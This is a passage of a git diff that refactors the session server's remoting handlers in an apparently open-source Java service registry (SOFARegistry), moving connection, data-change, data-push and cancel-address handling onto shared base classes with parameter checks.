DataNodeExchanger.java, v 0.1 2017-12-01 11:51 shangyu.wh Exp $ - */ -public class MetaNodeExchanger implements NodeExchanger { - - private static final Logger LOGGER = LoggerFactory - .getLogger(MetaNodeExchanger.class); - - @Autowired - private Exchange boltExchange; - - @Autowired - private SessionServerConfig sessionServerConfig; - - @Resource(name = "metaClientHandlers") - private Collection metaClientHandlers; - - @Autowired - private RaftClientManager raftClientManager; - - @Autowired - private NodeManager metaNodeManager; - - /** - * @see MetaNodeExchanger#request(Request) - */ - @Override - public Response request(Request request) throws RequestException { - - Response response; - URL url = request.getRequestUrl(); - try { - Client sessionClient = boltExchange.getClient(Exchange.META_SERVER_TYPE); - - if (sessionClient == null) { - LOGGER.warn( - "MetaNode Exchanger get dataServer connection {} error! Connection can not be null or disconnected!", - url); - sessionClient = boltExchange.connect(Exchange.META_SERVER_TYPE, url, - metaClientHandlers.toArray(new ChannelHandler[metaClientHandlers.size()])); - } - //try to connect data - Channel channel = sessionClient.getChannel(url); - if (channel == null) { - channel = sessionClient.connect(url); - } - try { - - final Object result = sessionClient.sendSync(channel, request.getRequestBody(), - sessionServerConfig.getDataNodeExchangeTimeOut()); - response = () -> result; - - } catch (Exception e) { - //retry - url = new URL(raftClientManager.refreshLeader().getIp(), - sessionServerConfig.getMetaServerPort()); - channel = sessionClient.getChannel(url); - if (channel == null) { - channel = sessionClient.connect(url); - } - LOGGER.warn("MetaNode Exchanger request send error!It will be retry once!Request url:{}", url); - - final Object result = sessionClient.sendSync(channel, request.getRequestBody(), - sessionServerConfig.getDataNodeExchangeTimeOut()); - response = () -> result; - } - } catch (Exception e) { - LOGGER.error("MetaNode Exchanger request data error!Request url:" + url, e); - throw new RequestException("MetaNode Exchanger request data error!Request url:" + url, - request, e); - } - - return response; - } - - @Override - public Client connectServer() { - - Collection nodes = metaNodeManager.getDataCenterNodes(); - if (nodes == null || nodes.isEmpty()) { - metaNodeManager.getAllDataCenterNodes(); - nodes = metaNodeManager.getDataCenterNodes(); - } - Client sessionClient = null; - for (MetaNode node : nodes) { - URL url = new URL(node.getIp(), sessionServerConfig.getMetaServerPort()); - try { - sessionClient = boltExchange.getClient(Exchange.META_SERVER_TYPE); - if (sessionClient == null) { - sessionClient = boltExchange.connect(Exchange.META_SERVER_TYPE, url, - metaClientHandlers.toArray(new ChannelHandler[metaClientHandlers.size()])); - } - } catch (Exception e) { - LOGGER.error("MetaNode Exchanger connect MetaServer error!url:" + url, e); - continue; - } - try { - Channel channel = sessionClient.getChannel(url); - if (channel == null) { - sessionClient.connect(url); - } - } catch (Exception e) { - LOGGER.error("MetaNode Exchanger connect channel error!url:" + url, e); - } - } - return sessionClient; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractClientDataRequestHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractClientDataRequestHandler.java new file mode 100644 index 000000000..df5c582c3 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractClientDataRequestHandler.java @@ -0,0 +1,48 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import java.util.concurrent.Executor; +import org.springframework.beans.factory.annotation.Autowired; + +public abstract class AbstractClientDataRequestHandler extends AbstractServerHandler { + @Autowired protected ExecutorManager executorManager; + + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.CLIENT; + } + + @Override + public Executor getExecutor() { + return executorManager.getAccessDataExecutor(); + } + + @Override + public InvokeType getInvokeType() { + return InvokeType.SYNC; + } + + @Override + protected void logRequest(Channel channel, T request) { + // not log + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractClientHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractClientHandler.java deleted file mode 100644 index 7cbeebdc3..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractClientHandler.java +++ /dev/null @@ -1,74 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.remoting.handler; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.RemotingException; - -/** - * - * @author shangyu.wh - * @version $Id: ClientHandler.java, v 0.1 2017-11-28 18:06 shangyu.wh Exp $ - */ -public abstract class AbstractClientHandler implements ChannelHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger("SESSION-CONNECT"); - - @Override - public void connected(Channel channel) throws RemotingException { - if (channel != null && channel.isConnected()) { - LOGGER - .info(getConnectNodeType() + " node connected,remote address:" - + channel.getRemoteAddress() + " localAddress:" + channel.getLocalAddress()); - } - } - - @Override - public void disconnected(Channel channel) { - if (channel != null && !channel.isConnected()) { - LOGGER - .info(getConnectNodeType() + " node disconnected,remote address:" - + channel.getRemoteAddress() + " localAddress:" + channel.getLocalAddress()); - } - } - - protected abstract NodeType getConnectNodeType(); - - @Override - public void caught(Channel channel, T message, Throwable exception) { - - } - - @Override - public void received(Channel channel, T message) { - - } - - @Override - public Object reply(Channel channel, T message) { - return null; - } - - @Override - public Class interest() { - return null; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractClientMetadataRequestHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractClientMetadataRequestHandler.java new file mode 100644 index 000000000..429a9f2e2 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractClientMetadataRequestHandler.java @@ -0,0 +1,44 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.strategy.AppRevisionHandlerStrategy; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import java.util.concurrent.Executor; +import org.springframework.beans.factory.annotation.Autowired; + +public abstract class AbstractClientMetadataRequestHandler extends AbstractServerHandler { + @Autowired protected ExecutorManager executorManager; + @Autowired protected AppRevisionHandlerStrategy appRevisionHandlerStrategy; + + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.CLIENT; + } + + @Override + public Executor getExecutor() { + return executorManager.getAccessMetadataExecutor(); + } + + @Override + public InvokeType getInvokeType() { + return InvokeType.SYNC; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractServerHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractServerHandler.java deleted file mode 100644 index bf8e42e81..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/AbstractServerHandler.java +++ /dev/null @@ -1,76 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.remoting.handler; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.RemotingException; - -/** - * - * @author shangyu.wh - * @version $Id: ServerHandler.java, v 0.1 2017-11-28 18:06 shangyu.wh Exp $ - */ -public abstract class AbstractServerHandler implements ChannelHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger("SESSION-CONNECT"); - - @Override - public void connected(Channel channel) throws RemotingException { - if (channel != null && channel.isConnected()) { - LOGGER - .info(getConnectNodeType() + " node connected,remote address:" - + channel.getRemoteAddress() + " localAddress:" + channel.getLocalAddress()); - } - } - - @Override - public void disconnected(Channel channel) throws RemotingException { - if (channel != null && !channel.isConnected()) { - LOGGER - .info(getConnectNodeType() + " node disconnected,remote address:" - + channel.getRemoteAddress() + " localAddress:" + channel.getLocalAddress()); - } - } - - protected NodeType getConnectNodeType() { - return NodeType.CLIENT; - } - - @Override - public void caught(Channel channel, T message, Throwable exception) { - - } - - @Override - public void received(Channel channel, T message) { - - } - - @Override - public Object reply(Channel channel, T message) throws RemotingException { - return null; - } - - @Override - public Class interest() { - return null; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/CancelAddressRequestHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/CancelAddressRequestHandler.java index 83f77ff2a..16948ff9c 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/CancelAddressRequestHandler.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/CancelAddressRequestHandler.java @@ -19,68 +19,43 @@ import com.alipay.sofa.registry.common.model.Node.NodeType; import com.alipay.sofa.registry.common.model.sessionserver.CancelAddressRequest; import com.alipay.sofa.registry.core.model.Result; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.server.session.registry.Registry; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.util.ParaCheckUtil; import org.springframework.beans.factory.annotation.Autowired; -import java.util.List; - /** - * * @author shangyu.wh * @version $Id: CancelHandler.java, v 0.1 2017-11-30 15:29 shangyu.wh Exp $ */ public class CancelAddressRequestHandler extends AbstractServerHandler { - private static final Logger LOGGER = LoggerFactory - .getLogger(CancelAddressRequestHandler.class); - - private static final Logger EXCHANGE_LOGGER = LoggerFactory.getLogger("SESSION-EXCHANGE", - "[CancelAddressRequestHandler]"); - - @Autowired - private Registry sessionRegistry; - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return CancelAddressRequest.class; - } - - @Override - protected NodeType getConnectNodeType() { - return NodeType.CLIENT; - } - - @Override - public Object reply(Channel channel, CancelAddressRequest cancelProcessRequest) { - - Result result = new Result(); - - try { - EXCHANGE_LOGGER.info("request={}", cancelProcessRequest); - List connectIds = cancelProcessRequest.getConnectIds(); - if (connectIds == null || connectIds.isEmpty()) { - LOGGER.error("Request connectIds cannot be null or empty!"); - result.setMessage("Request connectIds cannot be null or empty!"); - result.setSuccess(false); - return result; - } - sessionRegistry.cancel(connectIds); - } catch (Exception e) { - LOGGER.error("Cancel Address Request error!", e); - throw new RuntimeException("Cancel Address Request error!", e); - } - - result.setSuccess(true); - - return result; - } - -} \ No newline at end of file + @Autowired Registry sessionRegistry; + + @Override + public Class interest() { + return CancelAddressRequest.class; + } + + @Override + protected NodeType getConnectNodeType() { + return NodeType.CLIENT; + } + + @Override + public void checkParam(CancelAddressRequest request) { + ParaCheckUtil.checkNotEmpty(request.getConnectIds(), "request.connectIds"); + } + + @Override + public Object doHandle(Channel channel, CancelAddressRequest request) { + sessionRegistry.cancel(request.getConnectIds()); + return Result.success(); + } + + @Override + public Object buildFailedResponse(String msg) { + return Result.failed(msg); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/ClientNodeConnectionHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/ClientNodeConnectionHandler.java index 6c0dab457..d911cbc51 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/ClientNodeConnectionHandler.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/ClientNodeConnectionHandler.java @@ -16,91 +16,43 @@ */ package com.alipay.sofa.registry.server.session.remoting.handler; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.Node; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.RemotingException; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; import com.alipay.sofa.registry.server.session.registry.Registry; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; -import com.alipay.sofa.registry.server.session.store.DataStore; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.server.session.store.Watchers; +import com.alipay.sofa.registry.server.shared.remoting.ListenServerChannelHandler; +import java.util.Collections; import org.springframework.beans.factory.annotation.Autowired; -import java.util.ArrayList; -import java.util.List; -import java.util.Map; - /** - * * @author shangyu.wh * @version $Id: ServerConnectionLisener.java, v 0.1 2017-11-30 15:04 shangyu.wh Exp $ */ -public class ClientNodeConnectionHandler extends AbstractServerHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger("SESSION-CONNECT"); - - @Autowired - private Registry sessionRegistry; - - @Autowired - private DataStore sessionDataStore; - - @Autowired - private Interests sessionInterests; - - @Autowired - private Watchers sessionWatchers; - - @Autowired - private ExecutorManager executorManager; - - @Override - public HandlerType getType() { - return HandlerType.LISENTER; - } - - @Override - public void disconnected(Channel channel) throws RemotingException { - super.disconnected(channel); - fireCancelClient(channel); - } +public class ClientNodeConnectionHandler extends ListenServerChannelHandler { - public void fireCancelClient(Channel channel) { - //avoid block connect ConnectionEventExecutor thread pool - executorManager.getDisconnectClientExecutor().execute(()->{ + @Autowired Registry sessionRegistry; - String connectId = NetUtil.toAddressString(channel.getRemoteAddress()); - if(checkCache(connectId)) { - List connectIds = new ArrayList<>(); - connectIds.add(connectId); - sessionRegistry.cancel(connectIds); - } - }); - } + @Autowired ExecutorManager executorManager; - private boolean checkCache(String connectId) { - boolean checkSub = checkSub(connectId); - boolean checkPub = checkPub(connectId); - boolean checkWatcher = checkWatcher(connectId); - LOGGER.info("Client off checkCache connectId:{} result pub:{},sub:{},wat:{}", connectId, - checkPub, checkSub, checkWatcher); - return checkPub || checkSub || checkWatcher; - } + @Override + public void disconnected(Channel channel) { + super.disconnected(channel); + fireCancelClient(channel); + } - private boolean checkPub(String connectId) { - Map pubMap = sessionDataStore.queryByConnectId(connectId); - return pubMap != null && !pubMap.isEmpty(); - } + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.CLIENT; + } - private boolean checkSub(String connectId) { - Map subMap = sessionInterests.queryByConnectId(connectId); - return subMap != null && !subMap.isEmpty(); - } + void cancel(Channel channel) { + ConnectId connectId = ConnectId.of(channel.getRemoteAddress(), channel.getLocalAddress()); + sessionRegistry.cancel(Collections.singletonList(connectId)); + } - private boolean checkWatcher(String connectId) { - Map subMap = sessionWatchers.queryByConnectId(connectId); - return subMap != null && !subMap.isEmpty(); - } -} \ No newline at end of file + private void fireCancelClient(Channel channel) { + // avoid block connect ConnectionEventExecutor thread pool + executorManager.getConnectClientExecutor().execute(() -> cancel(channel)); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataChangeRequestHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataChangeRequestHandler.java index bc70a50c9..62591dc42 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataChangeRequestHandler.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataChangeRequestHandler.java @@ -17,116 +17,79 @@ package com.alipay.sofa.registry.server.session.remoting.handler; import com.alipay.sofa.registry.common.model.Node.NodeType; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; import com.alipay.sofa.registry.common.model.sessionserver.DataChangeRequest; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.cache.DatumKey; -import com.alipay.sofa.registry.server.session.cache.Key; -import com.alipay.sofa.registry.server.session.cache.Key.KeyType; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; +import com.alipay.sofa.registry.server.session.push.FirePushService; import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.server.session.strategy.DataChangeRequestHandlerStrategy; -import org.springframework.beans.factory.annotation.Autowired; - +import com.alipay.sofa.registry.server.shared.remoting.AbstractClientHandler; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import java.util.Map; import java.util.concurrent.Executor; +import org.springframework.beans.factory.annotation.Autowired; /** - * + * @author kezhu.wukz * @author shangyu.wh * @version $Id: DataChangeRequestHandler.java, v 0.1 2017-12-12 15:09 shangyu.wh Exp $ */ -public class DataChangeRequestHandler extends AbstractClientHandler { - - private static final Logger LOGGER = LoggerFactory - .getLogger(DataChangeRequestHandler.class); +public class DataChangeRequestHandler extends AbstractClientHandler { - private static final Logger EXCHANGE_LOGGER = LoggerFactory - .getLogger("SESSION-EXCHANGE"); + private static final Logger LOGGER = LoggerFactory.getLogger(DataChangeRequestHandler.class); + /** store subscribers */ + @Autowired Interests sessionInterests; - /** - * store subscribers - */ - @Autowired - private Interests sessionInterests; + @Autowired SessionServerConfig sessionServerConfig; - @Autowired - private SessionServerConfig sessionServerConfig; + @Autowired ExecutorManager executorManager; - @Autowired - private ExecutorManager executorManager; + @Autowired FirePushService firePushService; - @Autowired - private CacheService sessionCacheService; + @Override + protected NodeType getConnectNodeType() { + return NodeType.DATA; + } - @Autowired - private DataChangeRequestHandlerStrategy dataChangeRequestHandlerStrategy; + @Override + public Executor getExecutor() { + return executorManager.getDataChangeRequestExecutor(); + } - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } + @Override + public void checkParam(DataChangeRequest request) { + ParaCheckUtil.checkNotBlank(request.getDataCenter(), "request.dataCenter"); + ParaCheckUtil.checkNotNull(request.getDataInfoIds(), "request.dataInfoIds"); + } - @Override - protected NodeType getConnectNodeType() { - return NodeType.DATA; + @Override + public Object doHandle(Channel channel, DataChangeRequest dataChangeRequest) { + if (sessionServerConfig.isStopPushSwitch()) { + return null; } - - @Override - public Executor getExecutor() { - return executorManager.getDataChangeRequestExecutor(); - } - - @Override - public Object reply(Channel channel, Object message) { - - DataChangeRequest dataChangeRequest = (DataChangeRequest) message; - - dataChangeRequest.setDataCenter(dataChangeRequest.getDataCenter()); - dataChangeRequest.setDataInfoId(dataChangeRequest.getDataInfoId()); - - //update cache when change - sessionCacheService.invalidate(new Key(KeyType.OBJ, DatumKey.class.getName(), new DatumKey( - dataChangeRequest.getDataInfoId(), dataChangeRequest.getDataCenter()))); - - if (sessionServerConfig.isStopPushSwitch()) { - LOGGER.info("Stop Push data with switch on,dataChangeRequest: {}", dataChangeRequest); - return null; - } - try { - boolean result = sessionInterests.checkInterestVersions( - dataChangeRequest.getDataCenter(), dataChangeRequest.getDataInfoId(), - dataChangeRequest.getVersion()); - if (!result) { - return null; - } - - EXCHANGE_LOGGER.info( - "Data version has change,and will fetch to update!Request={},URL={}", - dataChangeRequest, channel.getRemoteAddress()); - - fireChangFetch(dataChangeRequest); - - } catch (Exception e) { - LOGGER.error("DataChange Request error!", e); - throw new RuntimeException("DataChangeRequest Request error!", e); + final String dataCenter = dataChangeRequest.getDataCenter(); + for (Map.Entry e : dataChangeRequest.getDataInfoIds().entrySet()) { + final String dataInfoId = e.getKey(); + final DatumVersion version = e.getValue(); + Interests.InterestVersionCheck check = + sessionInterests.checkInterestVersion(dataCenter, dataInfoId, version.getValue()); + if (!check.interested) { + if (check != Interests.InterestVersionCheck.NoSub) { + // log exclude NoSub + LOGGER.info("[SkipChange]{},{}, ver={}, {}", dataInfoId, dataCenter, version, check); } - - return null; - } - - /** - * - * @param dataChangeRequest - */ - private void fireChangFetch(DataChangeRequest dataChangeRequest) { - dataChangeRequestHandlerStrategy.doFireChangFetch(dataChangeRequest); - } - - @Override - public Class interest() { - return DataChangeRequest.class; + continue; + } + firePushService.fireOnChange(dataCenter, dataInfoId, version.getValue()); } -} \ No newline at end of file + return null; + } + + @Override + public Class interest() { + return DataChangeRequest.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataNodeConnectionHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataNodeConnectionHandler.java deleted file mode 100644 index e5f29820a..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataNodeConnectionHandler.java +++ /dev/null @@ -1,68 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.remoting.handler; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.RemotingException; -import com.alipay.sofa.registry.server.session.registry.SessionRegistry; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: ClientConnectionHandler.java, v 0.1 2017-12-08 20:17 shangyu.wh Exp $ - */ -public class DataNodeConnectionHandler extends AbstractClientHandler { - - private static final Logger taskLogger = LoggerFactory.getLogger(SessionRegistry.class, - "[Task]"); - - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - @Autowired - private TaskListenerManager taskListenerManager; - - @Override - public HandlerType getType() { - return HandlerType.LISENTER; - } - - @Override - public void connected(Channel channel) throws RemotingException { - super.connected(channel); - fireRegisterProcessIdTask(new URL(channel.getRemoteAddress())); - } - - @Override - protected NodeType getConnectNodeType() { - return NodeType.DATA; - } - - private void fireRegisterProcessIdTask(URL dataURL) { - TaskEvent taskEvent = new TaskEvent(dataURL, TaskType.SESSION_REGISTER_DATA_TASK); - taskLogger.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataPushRequestHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataPushRequestHandler.java index 5d8e9c486..6e8edf996 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataPushRequestHandler.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataPushRequestHandler.java @@ -21,9 +21,12 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.push.FirePushService; +import com.alipay.sofa.registry.server.shared.remoting.AbstractClientHandler; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import java.util.concurrent.Executor; import org.springframework.beans.factory.annotation.Autowired; /** @@ -32,61 +35,47 @@ * @author shangyu.wh * @version $Id: DataChangeRequestHandler.java, v 0.1 2017-12-12 15:09 shangyu.wh Exp $ */ -public class DataPushRequestHandler extends AbstractClientHandler { +public class DataPushRequestHandler extends AbstractClientHandler { - private static final Logger LOGGER = LoggerFactory - .getLogger(DataPushRequestHandler.class); + private static final Logger LOGGER = LoggerFactory.getLogger(DataPushRequestHandler.class); - private static final Logger TASK_LOGGER = LoggerFactory.getLogger( - DataPushRequestHandler.class, "[Task]"); + @Autowired FirePushService firePushService; - private static final Logger EXCHANGE_LOGGER = LoggerFactory.getLogger("SESSION-EXCHANGE", - "[DataPushRequestHandler]"); - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - @Autowired - private TaskListenerManager taskListenerManager; + @Autowired ExecutorManager executorManager; - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } + @Autowired SessionServerConfig sessionServerConfig; - @Override - protected NodeType getConnectNodeType() { - return NodeType.DATA; - } + @Override + public Executor getExecutor() { + return executorManager.getDataChangeRequestExecutor(); + } - @Override - public Object reply(Channel channel, Object message) { - if (!(message instanceof DataPushRequest)) { - LOGGER.error("Request message type {} is not mach the require data type!", message - .getClass().getName()); - return null; - } - DataPushRequest dataPushRequest = (DataPushRequest) message; - EXCHANGE_LOGGER.info("request={}", dataPushRequest); + @Override + public void checkParam(DataPushRequest request) { + ParaCheckUtil.checkNotNull(request.getDatum(), "request.datum"); + } - try { - fireDataPushTask(dataPushRequest); - } catch (Exception e) { - LOGGER.error("DataPush Request error!", e); - throw new RuntimeException("DataPush Request error!", e); - } + @Override + protected NodeType getConnectNodeType() { + return NodeType.DATA; + } - return null; + @Override + public Object doHandle(Channel channel, DataPushRequest request) { + if (sessionServerConfig.isStopPushSwitch()) { + return null; } - - private void fireDataPushTask(DataPushRequest dataPushRequest) { - //trigger fetch data for subscriber,and push to client node - TaskEvent taskEvent = new TaskEvent(dataPushRequest, TaskType.DATA_PUSH_TASK); - TASK_LOGGER.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); + try { + firePushService.fireOnDatum(request.getDatum()); + } catch (Throwable e) { + LOGGER.error("DataPush Request error!", e); + throw new RuntimeException("DataPush Request error!", e); } + return null; + } - @Override - public Class interest() { - return DataPushRequest.class; - } -} \ No newline at end of file + @Override + public Class interest() { + return DataPushRequest.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffDigestRequestHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffDigestRequestHandler.java new file mode 100644 index 000000000..04116b73a --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffDigestRequestHandler.java @@ -0,0 +1,110 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import 